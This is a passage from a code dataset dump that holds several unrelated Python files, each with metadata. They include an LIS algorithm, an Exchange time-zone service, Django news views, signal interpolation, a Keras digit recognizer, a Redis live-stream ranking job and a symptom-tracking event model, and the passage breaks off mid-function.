h.values()])\n\n@app.route(\"/probability\")\ndef probability():\n city = request.args.get('city', '')\n ref = request.args.get('referrer', '')\n d = conn.hget(city,ref)\n return d\n\n\n\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()\n","sub_path":"3/city-bot-api.py","file_name":"city-bot-api.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"227527229","text":"# https://leetcode.com/problems/longest-increasing-subsequence/discuss/74824/JavaPython-Binary-search-O(nlogn)-time-with-explanation\n# def LIS(arr): # only length\n# n = len(arr)\n# tails = [0] * n\n# size = 0\n# for i in range(n):\n# left = 0\n# right = size\n# while left < right:\n# mid = (left + right) // 2\n# if tails[mid] <= arr[i]:\n# left = mid + 1\n# else:\n# right = mid\n# tails[right] = arr[i]\n# size = max(right + 1, size)\n# return size\n\n\n# https://en.wikipedia.org/wiki/Longest_increasing_subsequence#Efficient_algorithms\n# def LIS(arr):\n# n = len(arr)\n# tails = [0] * n\n# path = [-1] * n\n# size = 0\n# for i in range(n):\n# left = 0\n# right = size\n# while left < right:\n# mid = (left + right) // 2\n# if arr[tails[mid]] <= arr[i]:\n# left = mid + 1\n# else:\n# right = mid\n# tails[right] = i\n# if right > 0:\n# path[i] = tails[right - 1]\n#\n# size = max(right + 1, size)\n# print(tails)\n#\n# solution = []\n# k = tails[size - 1]\n# while k != -1:\n# solution.append(arr[k])\n# k = path[k]\n# print(list(reversed(solution)))\n# return size\n\n\ndef LIS(arr):\n n = len(arr)\n tails = [0] * n\n size = 0\n path = []\n for i in range(n):\n path.append([0])\n for i in range(n):\n if arr[i] < tails[0]:\n tails[0] = arr[i]\n path[0][0] = arr[i]\n else:\n left = 1\n right = size\n while left < right:\n mid = (left + right) // 2\n if tails[mid] <= arr[i]:\n left = mid + 1\n else:\n right = mid\n tails[right] = arr[i]\n if right > 0:\n path[right] = path[right - 1][:]\n path[right].append(arr[i])\n else:\n path[0][0] = arr[i]\n size = max(right + 1, size)\n print(size)\n print(path)\n print(tails)\n return size\n\n\ndef main():\n arr = [5, 1, 2, 3, 3, 4, 2, 1, 2, 2, 3, 1]\n # arr = [8, 9, 1, 2, 3, 4]\n lis_legth = LIS(arr)\n print(lis_legth)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"15_4_6_LIS_nlogn.py","file_name":"15_4_6_LIS_nlogn.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"348963068","text":"import datetime\n\nfrom .common import EWSService\nfrom ..errors import NaiveDateTimeNotAllowed\nfrom ..ewsdatetime import EWSDateTime\nfrom ..fields import WEEKDAY_NAMES\nfrom ..util import create_element, set_xml_value, xml_text_to_value, peek, TNS, MNS\nfrom ..version import EXCHANGE_2010\n\n\nclass GetServerTimeZones(EWSService):\n \"\"\"MSDN:\n https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/getservertimezones-operation\n \"\"\"\n\n SERVICE_NAME = 'GetServerTimeZones'\n element_container_name = '{%s}TimeZoneDefinitions' % MNS\n supported_from = EXCHANGE_2010\n\n def call(self, timezones=None, return_full_timezone_data=False):\n return self._elems_to_objs(self._get_elements(payload=self.get_payload(\n timezones=timezones,\n return_full_timezone_data=return_full_timezone_data\n )))\n\n def get_payload(self, timezones, return_full_timezone_data):\n payload = create_element(\n 'm:%s' % self.SERVICE_NAME,\n attrs=dict(ReturnFullTimeZoneData='true' if return_full_timezone_data else 'false'),\n )\n if timezones is not None:\n is_empty, timezones = peek(timezones)\n if not is_empty:\n tz_ids = create_element('m:Ids')\n for timezone in timezones:\n tz_id = set_xml_value(create_element('t:Id'), timezone.ms_id, version=self.protocol.version)\n tz_ids.append(tz_id)\n payload.append(tz_ids)\n return payload\n\n def _elems_to_objs(self, elems):\n for elem in elems:\n if isinstance(elem, Exception):\n yield elem\n continue\n tz_id = elem.get('Id')\n tz_name = elem.get('Name')\n tz_periods = self._get_periods(elem)\n tz_transitions_groups = self._get_transitions_groups(elem)\n tz_transitions = self._get_transitions(elem)\n yield tz_id, tz_name, tz_periods, tz_transitions, tz_transitions_groups\n\n @staticmethod\n def _get_periods(timezonedef):\n tz_periods = {}\n periods = timezonedef.find('{%s}Periods' % TNS)\n for period in periods.findall('{%s}Period' % TNS):\n # Convert e.g. \"trule:Microsoft/Registry/W. Europe Standard Time/2006-Daylight\" to (2006, 'Daylight')\n p_year, p_type = period.get('Id').rsplit('/', 1)[1].split('-')\n tz_periods[(int(p_year), p_type)] = dict(\n name=period.get('Name'),\n bias=xml_text_to_value(period.get('Bias'), datetime.timedelta)\n )\n return tz_periods\n\n @staticmethod\n def _get_transitions_groups(timezonedef):\n tz_transitions_groups = {}\n transitiongroups = timezonedef.find('{%s}TransitionsGroups' % TNS)\n if transitiongroups is not None:\n for transitiongroup in transitiongroups.findall('{%s}TransitionsGroup' % TNS):\n tg_id = int(transitiongroup.get('Id'))\n tz_transitions_groups[tg_id] = []\n for transition in transitiongroup.findall('{%s}Transition' % TNS):\n # Apply same conversion to To as for period IDs\n to_year, to_type = transition.find('{%s}To' % TNS).text.rsplit('/', 1)[1].split('-')\n tz_transitions_groups[tg_id].append(dict(\n to=(int(to_year), to_type),\n ))\n for transition in transitiongroup.findall('{%s}RecurringDayTransition' % TNS):\n # Apply same conversion to To as for period IDs\n to_year, to_type = transition.find('{%s}To' % TNS).text.rsplit('/', 1)[1].split('-')\n occurrence = xml_text_to_value(transition.find('{%s}Occurrence' % TNS).text, int)\n if occurrence == -1:\n # See TimeZoneTransition.from_xml()\n occurrence = 5\n tz_transitions_groups[tg_id].append(dict(\n to=(int(to_year), to_type),\n offset=xml_text_to_value(transition.find('{%s}TimeOffset' % TNS).text, datetime.timedelta),\n iso_month=xml_text_to_value(transition.find('{%s}Month' % TNS).text, int),\n iso_weekday=WEEKDAY_NAMES.index(transition.find('{%s}DayOfWeek' % TNS).text) + 1,\n occurrence=occurrence,\n ))\n return tz_transitions_groups\n\n @staticmethod\n def _get_transitions(timezonedef):\n tz_transitions = {}\n transitions = timezonedef.find('{%s}Transitions' % TNS)\n if transitions is not None:\n for transition in transitions.findall('{%s}Transition' % TNS):\n to = transition.find('{%s}To' % TNS)\n if to.get('Kind') != 'Group':\n raise ValueError('Unexpected \"Kind\" XML attr: %s' % to.get('Kind'))\n tg_id = xml_text_to_value(to.text, int)\n tz_transitions[tg_id] = None\n for transition in transitions.findall('{%s}AbsoluteDateTransition' % TNS):\n to = transition.find('{%s}To' % TNS)\n if to.get('Kind') != 'Group':\n raise ValueError('Unexpected \"Kind\" XML attr: %s' % to.get('Kind'))\n tg_id = xml_text_to_value(to.text, int)\n try:\n t_date = xml_text_to_value(transition.find('{%s}DateTime' % TNS).text, EWSDateTime).date()\n except NaiveDateTimeNotAllowed as e:\n # We encountered a naive datetime. Don't worry. we just need the date\n t_date = e.local_dt.date()\n tz_transitions[tg_id] = t_date\n return tz_transitions\n","sub_path":"exchangelib/services/get_server_time_zones.py","file_name":"get_server_time_zones.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"30543405","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Haberler, Kategori\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n# Create your views here.\ndef anasayfa(request):\n post_list=Haberler.objects.all()\n query=request.GET.get('q')\n if query:\n post_list=post_list.filter(title__icontains=query)\n paginator = Paginator(post_list, 10) # Show 25 contacts per page\n\n page = request.GET.get('sayfa')\n try:\n post_list = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n post_list = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n post_list = paginator.page(paginator.num_pages)\n\n categori=Kategori.objects.get(id=1)\n categori_list=categori.posts.all()\n paginator = Paginator(categori_list, 5) # Show 25 contacts per page\n\n page = request.GET.get('page')\n try:\n categori_list = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n categori_list = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n categori_list = paginator.page(paginator.num_pages)\n\n context={'list':post_list,'categori_list':categori_list,}\n return render(request, 'index.html', context)\n\ndef gundem(request):\n post=Kategori.objects.get(id=1)\n liste=post.posts.all()\n context={\n 'liste':liste,\n }\n return render(request, 'gundem.html', context)\n\ndef ekonomi(request):\n post=Kategori.objects.get(id=2)\n veri=post.posts.all()\n context={\n 'veri':veri,\n }\n return render(request, 'ekonomi.html', context)\n\ndef siyaset(request):\n post=Kategori.objects.get(id=3)\n veri=post.posts.all()\n context={\n 'veri':veri,\n }\n return render(request, 'siyaset.html', context)\n\ndef spor(request):\n post=Kategori.objects.get(id=4)\n veri=post.posts.all()\n context={\n 'veri':veri,\n }\n return render(request, 'spor.html', context)\n\ndef detail(request, id):\n kayit=get_object_or_404(Haberler, id=id)\n context={\n 'gelenveri':kayit,\n }\n return render(request, 'detail.html', context) ","sub_path":"uygulama/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"420834194","text":"\ndef upsample(x,M):\n import numpy as np\n \n output = np.hstack((x.reshape(len(x),1),np.zeros((len(x),M-1))))\n return output.flatten()\n\ndef sinc_interp(x, s, u):\n \"\"\"\n Taken from endolith's github\n \n Interpolates x, sampled at \"s\" instants\n Output y is sampled at \"u\" instants (\"u\" for \"upsampled\")\n \n from Matlab:\n http://phaseportrait.blogspot.com/2008/06/sinc-interpolation-in-matlab.html \n \"\"\"\n \n import numpy as np\n \n assert len(x) == len(s), 'x and s must be the same length'\n \n # Find the period \n T = s[1] - s[0]\n \n sincM = np.tile(u, (len(s), 1)) - np.tile(s[:, np.newaxis], (1, len(u)))\n y = np.dot(x, np.sinc(sincM/T))\n return y\n\n\nif __name__=='__main__':\n import numpy as np\n\n from matplotlib import pyplot as plt\n from scipy import signal\n from random import randint\n\n from filter_ir import *\n \n sample_rate=32e3\n samples_per_symbol=8\n m=4 #constelation size\n num_sym=64 #number of symbols\n\n symbol_map={0:(-1.0,-1.0),1:(-1.0,1.0),2:(1.0,-1.0),3:(1.0,1.0)}\n\n rrc_ir=root_raised_cos(samples_per_symbol,0.35,M=6) \n \n data=np.array([randint(0,m-1) for tmp in range(num_sym)])\n IQ_n1=np.pad(np.array([symbol_map[x][0]+symbol_map[x][1]*1j for x in data]),10,mode='constant')\n \n IQ_n2=upsample(IQ_n1,samples_per_symbol)\n\n IQ_n3=signal.convolve(IQ_n2,rrc_ir,mode='same')\n IQ_n4=signal.convolve(IQ_n3,rrc_ir,mode='same')/samples_per_symbol\n\n Ns=np.arange(0,len(IQ_n4))\n \n u=np.linspace(0,len(Ns),num=len(Ns))\n Y=sinc_interp(IQ_n4,Ns-15.1,u)\n\n plt.plot(Ns,IQ_n4.real)\n plt.plot(u,Y.real)\n plt.show()\n \n","sub_path":"sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"650913987","text":"#!/usr/bin/env python3\n#\n# Handwritten figures recognition => classification\n# also see https://www.tensorflow.org/api_docs/python/tf/keras and similar pages.\n#\n# Similar to sample.05.1.py, but with YOUR own images.\n# Model training.h5 must already exist\n#\n# Great doc at https://medium.com/@ashok.tankala/build-the-mnist-model-with-your-own-handwritten-digits-using-tensorflow-keras-and-python-f8ec9f871fd3\n#\n# Interactive: https://ashok.tanka.la/assets/examples/mnist/mnist.html\n#\n# pip install opencv-python\n#\nimport tensorflow as tf\nimport numpy as np\nimport sys\nimport warnings\n# Python Imaging Library.\n# If 'pip install PIL' fails, try 'pip install Pillow'\nfrom PIL import Image\nimport subprocess as sp\nimport platform\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nsys.path.append('../')\nimport tf_utils\n\nwarnings.filterwarnings('ignore')\n\ntf_version = tf.__version__\nprint(\"TensorFlow version\", tf_version)\nprint(\"Keras version\", tf.keras.__version__)\n\nprint(\"{} script arguments.\".format(len(sys.argv)))\n\nsess = tf_utils.get_TF_session()\ndevices = sess.list_devices()\nprint(\"----- D E V I C E S -----\")\nfor d in devices:\n print(d.name)\nprint(\"-------------------------\")\n\nmodel = None\ntry:\n model = tf.keras.models.load_model('training.h5')\n print(\">> Model is now loaded\")\nexcept OSError:\n print('Model not found?')\n sys.exit(1)\n\nkeepLooping = True\nprint(\"Type Q or q to exit the loop\")\nwhile keepLooping:\n userInput = input(\"Enter the image file name (Q to quit) > \")\n if userInput != 'Q' and userInput != 'q':\n try:\n img = Image.open(userInput).convert(\"L\")\n img = np.resize(img, (28, 28, 1))\n im2arr = np.array(img)\n im2arr = im2arr.reshape(1, 28, 28, 1)\n pred = model.predict_classes(im2arr)\n precision = model.predict(im2arr)\n print(\"Prediction: it looks like a \", pred, \" (\", precision[0][np.argmax(precision)] * 100, \"% sure ), Nb predictions:\", len(precision))\n if platform.system() == 'Darwin':\n # for voice list, see https://gist.github.com/mculp/4b95752e25c456d425c6\n # also, try 'say -v ?'\n sp.run(['say',\n 'It looks like a ' + np.array2string(pred) + ' to me, I\\'m {:2.0f}% sure'.format(precision[0][np.argmax(precision)] * 100)])\n plt.imshow(mpimg.imread(userInput))\n # plt.imshow(img, cmap=plt.cm.binary)\n plt.show()\n except FileNotFoundError:\n print(\"File\", userInput, \"not found...\")\n else:\n keepLooping = False\n\nprint(\"Bye!\")\n","sub_path":"JupyterNotebooks/deep.learning.crash.course/digit.demo/sample.05.2.save.py","file_name":"sample.05.2.save.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"74341802","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport numpy as np\nfrom lfpcluster import LFPCluster\nfrom scipy.io import loadmat\nfrom scipy.cluster.hierarchy import dendrogram, linkage\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# Load dataset\ndata = loadmat('../data/F141020-lfp-5min-1kHz.mat')\n\nZ_pre = data['pre_pmcao'] # Extract pre-stroke data\nZ_post = data['post_pmcao'] # Extract post-stroke data\n\n\ndef plot_dendrogram(Z_clust, bad_channels=None, max_d=None):\n if bad_channels is None:\n labels = [i for i in range(1, 33)]\n else:\n labels = [i for i in range(1, 33) if i not in bad_channels]\n\n dend = dendrogram(Z_clust, color_threshold=1, labels=labels)\n if max_d:\n plt.axhline(y=max_d, c='k')\n plt.show()\n \n\n# Bad channels\n#bad_channels = np.array([5, 8, 9, 12, 16, 26])\nbad_channels = {5, 8, 9, 12, 16, 26}\n\nrate = 1000\npre_cluster = LFPCluster(Z_pre, rate, bad_channels)\n\nnum_epochs = 300\npre_cluster.standardize_lfp(num_epochs)\nZpre_clust, my_clusters = pre_cluster.get_clusters(k=4, epoch=1)\nplot_dendrogram(Zpre_clust, bad_channels, max_d=0.8)\n\n#pre_cluster.plot_clusters(epoch=1)\n\nepochs_exc_chs_11_15_16 = {54, 63, 64, 114, 115, 116, 117, 136, 137,\n 138, 139, 140, 141, 151, 152, 153, 154, 161,\n 162, 163, 164, 165, 166, 167, 168, 182, 183,\n 184, 185, 186, 187, 200, 201, 202, 203, 204,\n 205, 206, 207, 208, 223, 224, 237, 238, 239,\n 240, 296, 297}\nepochs_exc_chs_15_16 = {62, 65, 66}\nepochs_exc_chs_11_16 = {236, 241, 243}\nepochs_exc_chs_16 = {171, 172}\nepochs_exc_chs_11 = {119}\n\npost_clust = LFPCluster(Z_post, rate, bad_channels)\n\n#for i in range(1, 301):\n# if i in epochs_exc_chs_11_15_16:\n# ex_chs = {10, 14, 15}\n# elif i in epochs_exc_chs_15_16:\n# ex_chs = {14, 15}\n# elif i in epochs_exc_chs_11_16:\n# ex_chs = {10, 15}\n# elif i in epochs_exc_chs_16:\n# ex_chs = {15}\n# elif i in epochs_exc_chs_11:\n# ex_chs = {10}\n# else:\n# ex_chs = None\n#\n# my_post_clusters = post_clust.get_clusters(k=4, epoch=i, ex_chs=ex_chs)\n# post_clust.plot_clusters(epoch=i, clusters=my_post_clusters)\n# fname = 'post_cluster_epoch_{}.png'.format(i+1)\n# plt.savefig(fname, bbox_inches='tight')\n# plt.close()\n\n\n","sub_path":"brainviz/lfpcluster/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"590118375","text":"# coding=utf-8\n\n\"\"\"\nA、仅展示普通类型的作品,不展示会议类型。\nB、从作品主分类中提取,不展示观点。\nC、按作品周>月>总热度降序排列,最热的排名靠前,有多少返回多少,最多返回3条。\n\n更新机制:1小时一次\n\"\"\"\n\nfrom util import redis_util\nimport dbutil\nfrom config_default import *\n\nconn = dbutil.connect(DB_URL)\nr = redis_util.get_redis()\n\nWORKS_CATEGORY_KEY = 'ks_web:live:works:category:%s'\n\nsql = '''\n SELECT ltt.live_id,\n ltt.type_name,\n SUM(ltt.hot_index) AS hot_index\n FROM\n (\n SELECT\n lhr.live_id,\n l_type.type_name,\n IF (\n sum(lhr.heart_count) * 10 > lt.live_duration,\n lt.live_duration,\n sum(lhr.heart_count) * 10\n ) AS hot_index\n FROM\n ks_live.live_task lt\n INNER JOIN ks_data_statistics.live_heart_record lhr ON lt.id = lhr.live_id\n LEFT JOIN ks_live.live_task_type ltt ON ltt.live_task_id = lt.id AND ltt.`level` = 1\n LEFT JOIN ks_live.live_type l_type ON l_type.id = ltt.type_id\n WHERE\n lhr.live_id > 0\n AND lt.works_status = 2\n AND lt.live_type = 0\n %s\n GROUP BY lhr.live_id, lhr.uid\n ) ltt\n GROUP BY\n ltt.live_id\n ORDER BY ltt.type_name DESC, ltt.hot_index DESC\n'''\n\n\ndef main():\n week_items = conn.all(sql % 'AND lhr.create_time > DATE_ADD(CURRENT_DATE, INTERVAL -7 DAY)')\n month_items = conn.all(sql % 'AND lhr.create_time > DATE_ADD(CURRENT_DATE, INTERVAL -30 DAY)')\n total_items = conn.all(sql % '')\n\n live_dict = {}\n for item in week_items:\n live_id = item['live_id']\n type_name = item['type_name']\n hot_index = item['hot_index']\n\n live_dict.setdefault(live_id, {})\n live_dict[live_id]['type_name'] = type_name\n live_dict[live_id]['week_hot_index'] = hot_index\n for item in month_items:\n live_id = item['live_id']\n type_name = item['type_name']\n hot_index = item['hot_index']\n\n live_dict.setdefault(live_id, {})\n live_dict[live_id]['type_name'] = type_name\n live_dict[live_id]['month_hot_index'] = hot_index\n for item in total_items:\n live_id = item['live_id']\n type_name = item['type_name']\n hot_index = item['hot_index']\n\n live_dict.setdefault(live_id, {})\n live_dict[live_id]['type_name'] = type_name\n live_dict[live_id]['total_hot_index'] = hot_index\n\n live_arr = []\n for live_id in live_dict.keys():\n live_arr.append({\n 'live_id': live_id,\n 'type_name': live_dict[live_id]['type_name'],\n 'week_hot_index': live_dict[live_id].get('week_hot_index', 0),\n 'month_hot_index': live_dict[live_id].get('month_hot_index', 0),\n 'total_hot_index': live_dict[live_id].get('total_hot_index', 0)\n })\n\n live_arr = sorted(live_arr, key=lambda x: (x['type_name'], -x['week_hot_index'],\n -x['month_hot_index'], -x['total_hot_index']))\n\n p = r.pipeline()\n for l in live_arr:\n live_id = l['live_id']\n type_name = l['type_name']\n\n sim_list = [x['live_id'] for x in live_arr if x['live_id'] != live_id and x['type_name'] == type_name][:3]\n\n p.delete(WORKS_CATEGORY_KEY % live_id)\n if len(sim_list) > 0:\n p.rpush(WORKS_CATEGORY_KEY % live_id, *sim_list)\n p.execute()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"task/live_category.py","file_name":"live_category.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"622151658","text":"from time import struct_time as EventTimeImpl\nfrom enum import Enum\nfrom random import Random\nrandgen = Random()\n\ndef is_leap_year(year):\n return (year - 2000) % 4 == 0\n\nmins_per_day = 24*60\ndef get_num_days_per_months(is_leap):\n return [None,31,29 if is_leap else 28,31,30,31,30,31,31,30,31,30,31]\ndef fix_month_day(year,month,day):\n return min(day,get_num_days_per_months(is_leap_year(year))[month])\n\nnum_mins_per_year = {}\n\nfor year in range(2010,2020):\n res = 0\n num_days_per_month = get_num_days_per_months(is_leap_year(year))\n for month in range(1,13):\n res += num_days_per_month[month]\n num_mins_per_year[year] = res\n\nEPOCH_YEAR = 2015 # Epoch is 2015-01-01 00:00\n\nclass EventTime:\n def __init__(self,year=1970,month=1,day=1,hours=0,minutes=0,seconds=0):\n '''\n year (including century, e.g. 1998)\n month (1-12)\n day (1-31)\n hours (0-23)\n minutes (0-59)\n seconds (0-59)\n weekday (0-6, Monday is 0)\n Julian day (day in the year, 1-366)\n DST (Daylight Savings Time) flag (-1, 0 or 1))\n '''\n self.year=year\n self.month=month\n self.day=day\n self.hours=hours\n self.minutes=minutes\n self.seconds=seconds\n def __str__(self):\n return '%04d-%02d-%02d %02d:%02d:%02d' % (self.year, self.month, self.day, self.hours, self.minutes, self.seconds)\n def get_impl(self):\n return EventTimeImpl(self.year,self.month,self.day,self.hours,self.minutes,self.seconds,0,1,0)\n def get_num_mins_this_year(self):\n num_mins = 0\n num_days_per_month = get_num_days_per_months(is_leap_year(self.year))\n for m in range(1,self.month):\n num_mins += num_days_per_month[m] * mins_per_day\n num_mins += (self.day - 1) * mins_per_day\n num_mins += self.hours * 60\n num_mins += self.minutes\n return num_mins\n def get_num_mins_till_epoch(self):\n result = 0\n for year in range(EPOCH_YEAR, self.year):\n result += num_mins_per_year[year]\n result += self.get_num_mins_this_year()\n return result\n\nclass eRegistryType:\n suspect = 'suspect'\n symptom = 'symptom'\n\nclass EventType:\n category = None\n def __init__(self, registry_type, name):\n self.registry_type = registry_type\n self.name = name\n def __str__(self):\n return self.category + '-' + self.name\n\nclass EventCategory:\n def __init__(self, registry_type, name):\n #assert isinstance(registry_type, eRegistryType)\n self.registry_type = registry_type\n self.name = name\n self.event_types = []\n def __str__(self):\n s = self.name + '\\n'\n l = len(self.event_types)\n for i in range(l):\n s += ' ' + str(self.event_types[i]) + ('\\n' if i != (l-1) else '')\n return s\n def add_event_type(self, event_type):\n event_type.category = self.name\n event_type.registry_type = self.registry_type\n self.event_types.append(event_type)\n\nclass EventRegistry:\n def __init__(self, registry_type):\n #assert isinstance(registry_type, eRegistryType)\n self.registry_type = registry_type\n if self.registry_type == eRegistryType.suspect:\n self.categories = []\n\n food = EventCategory(self.registry_type, 'food')\n food.add_event_type(EventType(self.registry_type, 'soup'))\n food.add_event_type(EventType(self.registry_type, 'bread'))\n food.add_event_type(EventType(self.registry_type, 'chocolate'))\n self.categories.append(food)\n\n food_prep = EventCategory(self.registry_type, 'food_preparation')\n food_prep.add_event_type(EventType(self.registry_type, 'baked'))\n food_prep.add_event_type(EventType(self.registry_type, 'cooked'))\n food_prep.add_event_type(EventType(self.registry_type, 'fried'))\n self.categories.append(food_prep)\n\n drinks = EventCategory(self.registry_type, 'drinks')\n drinks.add_event_type(EventType(self.registry_type, 'milk'))\n drinks.add_event_type(EventType(self.registry_type, 'water'))\n drinks.add_event_type(EventType(self.registry_type, 'cola'))\n drinks.add_event_type(EventType(self.registry_type, 'orange_juice'))\n self.categories.append(drinks)\n\n weather = EventCategory(self.registry_type, 'weather')\n weather.add_event_type(EventType(self.registry_type, 'rainy'))\n weather.add_event_type(EventType(self.registry_type, 'cold'))\n weather.add_event_type(EventType(self.registry_type, 'warm'))\n weather.add_event_type(EventType(self.registry_type, 'hot'))\n self.categories.append(weather)\n\n elif self.registry_type == eRegistryType.symptom:\n self.categories = []\n\n pain = EventCategory(self.registry_type, 'pain')\n pain.add_event_type(EventType(self.registry_type, 'head'))\n pain.add_event_type(EventType(self.registry_type, 'stomach'))\n self.categories.append(pain)\n\n mental = EventCategory(self.registry_type, 'mental')\n mental.add_event_type(EventType(self.registry_type, 'dizzy'))\n mental.add_event_type(EventType(self.registry_type, 'nausea'))\n self.categories.append(mental)\n\n mental = EventCategory(self.registry_type, 'toilet')\n mental.add_event_type(EventType(self.registry_type, 'normal'))\n mental.add_event_type(EventType(self.registry_type, 'bad'))\n self.categories.append(mental)\n\n else:\n raise Warning('Unknown registry type.')\n def __str__(self):\n s = ''\n l = len(self.categories)\n for i in range(l):\n s += ' ' + str(self.categories[i]) + ('\\n' if i != (l-1) else '')\n return s\n\n def add_category(self, cat):\n self.categories.append(cat)\n\n def get_random_event_type(self):\n cat_r = randgen.randint(0, len(self.categories)-1)\n cat = self.categories[cat_r]\n assert isinstance(cat, EventCategory)\n event_r = randgen.randint(0, len(cat.event_types) - 1)\n event = cat.event_types[event_r]\n assert isinstance(event, EventType)\n return event\n\nclass Event:\n def __init__(self, event_time, event_type):\n assert isinstance(event_time,EventTime)\n assert isinstance(event_type,EventType)\n self.event_time = event_time\n self.event_type = event_type\n def __str__(self):\n return\\\n str(self.event_time) + ' ' + str(self.event_type)\n\nclass EventsHolder:\n def __init__(self):\n self.events = {}\n def add_event(self, event):\n assert isinstance(event, Event)\n self.events[event.event_time.get_num_mins_till_epoch()] = event\n def __str__(self):\n s=''\n assert isinstance(self.events, dict)\n keys = [x for x in self.events.keys()]\n keys.sort()\n for key in keys:\n s += ' %06d | '%key + str(self.events[key]) + '\\n'\n return s\n def get_keys_in_range(self, start, end):\n return [x for x in self.events.keys() if (x >= start and x < end)]\n def get_keys_before_reference(self, ref, hours=0, mins=0, days=0):\n mins_before = days * mins_per_day + hours * 60 + mins\n return self.get_keys_in_range(ref-mins_before,ref)\n\nclass Suspicion:\n def __init__(self):\n self.occurrences = 0\n def __str__(self):\n return str(self.occurrences)\n\nclass SymptomResult:\n def __init__(self):\n self.occurrences = 0\n self.suspicions = {}\n def __str__(self):\n s = [(self.suspicions[x].occurrences, x) for x in self.suspicions]\n s.sort(reverse=True)\n return\\\n ' occur: ' + str(self.occurrences) + '\\n' +\\\n ' Suspects:\\n' +\\\n ' ' +\\\n '\\n '.join(['%02d (%s)'%(x[0],x[1]) for x in s])\n\nclass User:\n def __init__(self, id):\n self.id = id\n self.suspects = EventRegistry(eRegistryType.suspect)\n self.symptoms = EventRegistry(eRegistryType.symptom)\n self.symptoms_event_holder = EventsHolder()\n self.suspects_event_holder = EventsHolder()\n def add_category(self, cat):\n assert isinstance(cat, EventCategory)\n if cat.registry_type == eRegistryType.suspect:\n self.suspects.add_category(cat)\n elif cat.registry_type == eRegistryType.symptom:\n self.symptoms.add_category(cat)\n else:\n raise Warning('Unknown registry type.')\n def add_event(self, event):\n assert isinstance(event, Event)\n if event.event_type.registry_type == eRegistryType.suspect:\n self.suspects_event_holder.add_event(event)\n elif event.event_type.registry_type == eRegistryType.symptom:\n self.symptoms_event_holder.add_event(event)\n else:\n raise Warning('Unknown registry type.')\n def __str__(self):\n s = ''\n s += 'user: ' + self.id + '\\n'\n s += ' suspects:\\n' + str(self.suspects) + '\\n'\n s += ' symptoms:\\n' + str(self.symptoms) + '\\n'\n s += ' events (suspects):\\n' + str(self.suspects_event_holder) + '\\n'\n s += ' events (symptoms):\\n' + str(self.symptoms_event_holder) + '\\n'\n s += ' analyze result:\\n'\n for key in self.analyze_result:\n s += ' ' + key + ':\\n' + str(self.analyze_result[key]) + '\\n'\n return s\n def analyze_symptoms(self):\n self.analyze_result = {}\n\n # Iterate through the symptoms which were added as events to the calendar database.\n for symptom_mins in self.symptoms_event_holder.events:\n symptom_event = self.symptoms_event_holder.events[symptom_mins]\n assert isinstance(symptom_event, Event)\n\n symptom_id = str(symptom_event.event_type)\n if symptom_id not in self.analyze_result:\n self.analyze_result[symptom_id] = SymptomResult()\n self.analyze_result[symptom_id].occurrences += 1\n\n # Find suspects for the current symptom and modify the stats about that symptom.\n suspects_keys = self.suspects_event_holder.get_keys_before_reference(symptom_mins,hours=4)\n for suspects_key in suspects_keys:\n suspect_event = self.suspects_event_holder.events[suspects_key]\n suspect_id = str(suspect_event.event_type)\n if suspect_id not in self.analyze_result[symptom_id].suspicions:\n self.analyze_result[symptom_id].suspicions[suspect_id] = Suspicion()\n self.analyze_result[symptom_id].suspicions[suspect_id].occurrences += 1\n\n # for symptom_category in self.symptoms.categories:\n # assert isinstance(symptom_category, EventCategory)\n # for symptom in symptom_category.event_types:\n # self.analyze_result[str(symptom)] = 1\n\nclass TestUser(User):\n def __init__(self, id):\n User.__init__(self, id)\n @staticmethod\n def get_random_year(start=2015,end=2015):\n return EventTime(randgen.randint(start,end))\n @staticmethod\n def replace_random_month(event_time,start=1,end=12):\n assert isinstance(event_time,EventTime)\n event_time.month=randgen.randint(start,end)\n @staticmethod\n def replace_random_day(event_time,start=1,end=31):\n assert isinstance(event_time,EventTime)\n end=fix_month_day(event_time.year,event_time.month,end)\n event_time.day=randgen.randint(start,end)\n @staticmethod\n def replace_random_hours(event_time,start=0,end=23):\n assert isinstance(event_time,EventTime)\n event_time.hours=randgen.randint(start,end)\n @staticmethod\n def replace_random_minutes(event_time,start=0,end=59):\n assert isinstance(event_time,EventTime)\n event_time.minutes=randgen.randint(start,end)\n @staticmethod\n def get_default_random_event_time():\n t = TestUser.get_random_year()\n TestUser.replace_random_month(t)\n TestUser.replace_random_day(t)\n TestUser.replace_random_hours(t)\n TestUser.replace_random_minutes(t)\n return t\n def add_random_events_for_day(self, num_suspects=100, num_symptoms=30):\n for i in range(num_suspects):\n 